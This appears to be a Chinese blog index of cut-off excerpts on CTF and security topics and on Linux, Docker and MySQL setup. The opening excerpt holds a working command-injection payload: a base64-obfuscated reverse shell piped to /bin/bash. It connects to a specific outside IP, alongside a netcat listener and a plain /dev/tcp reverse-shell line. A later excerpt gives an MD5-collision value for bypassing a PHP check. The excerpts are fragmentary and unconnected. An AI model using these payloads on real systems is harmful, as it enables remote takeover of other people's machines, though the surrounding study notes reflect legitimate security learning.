用VPS反弹shell攻击机监听端口 1nc -lvp 2333 目标机 123127.0.0.1 | echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjIuNzUuMTI2LzIzMzMgMD4mMQ== | base64 -d| /bin/bash127.0.0.1 | echo bash -i >& /dev/tcp/47.122.75.126/2

123对于：(string)$_GET['md5_1'] !== (string)$_GET['md5_2'] && md5($_GET['md5_1']) === md5($_GET['md5_2'])● md5_1=%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6

1234567891011121314151617& 用于在同一命令行中依次执行多个命令，不管前面的命令执行是否成功，后面的命令都会继续执行&& 同样用于依次执行多个命令，但只有当前面的命令成功执行（返回退出码为 0）时，后面的命令才会执行| 是管道符，将前一个命令的输出作为后一个命令的输入|| 用于依次执行多个命令，只有当前面的命令执行失败（返回退出码不为 0）时

什么是反弹shell反弹shell（Reverse Shell）是一种常见的攻击方式，通常用于远程控制目标系统。它与传统的“反向连接”（Reverse Connection）相似，通过允许目标系统主动连接回攻击者的机器，从而绕过防火墙或NAT（网络地址转换）等网络安全措施。 反弹 shell 是一种网络攻击技术，它允许攻击者在远程目标机器上执行一个命令，使得目标机器主动向攻击者的机器发起网络连接，

Linux基础指令ls语法1ls [选项] [目录或文件] 功能对于目录，该命令列出该目录下的所有子目录与文件。对于文件，将列出文件名以及其他信息。 常用选项 -a 列出目录下的所有文件，包括以 . 开头的隐含文件。 -d 将目录象文件一样显示，而不是显示其下的文件。 如：ls –d 指定目录 -i 输出文件的 i 节点的索引信息。 如 ls –ai 指定文件 -k

参考文章 Git文件泄露漏洞：https://blog.csdn.net/qq_45521281/article/details/105767428 什么是GitGit是目前世界上最先进的免费开源分布式版本控制系统，其诞生主要是为了高效管理像 Linux 内核这种规模的庞大项目 什么是版本控制系统版本控制系统（Version Control System，VCS）是一种在软件开发过程中用于管理

前置知识—session当session_start()被调用或者php.ini中session.auto_start为1时，PHP内部调用会话管理器，访问用户session被序列化后，存储到指定目录（默认为/tmp） 存取格式有多种，常见的有如下三种，主要是前俩 处理器 对应的存储格式 php 键名 + 竖线 + 经过serialize()函数序列化处理的值 php_serial

网址：https://www.bt.cn/new/download.html 安装命令 1if [ -f /usr/bin/curl ];then curl -sSO https://download.bt.cn/install/install_panel.sh;else wget -O install_panel.sh https://download.bt.cn/install/install

更新系统包 1sudo apt update 安装docker 1apt install docker-cli 验证是否安装成功（拉取hello-word镜像） 1sudo docker run hello-world 安装docker-compose 1apt install docker-compose 出现报错，有无法下载的就加命令 1apt install docker-compo

更新软件包列表 1sudo apt update 安装 MySQL 服务器 1sudo apt install mysql-server 启动MySQL服务 1sudo systemctl start mysql 设置开机自启动 1sudo systemctl enable mysql 检查MySQL服务状态 1sudo systemctl status mysql 运行安全脚本，可以设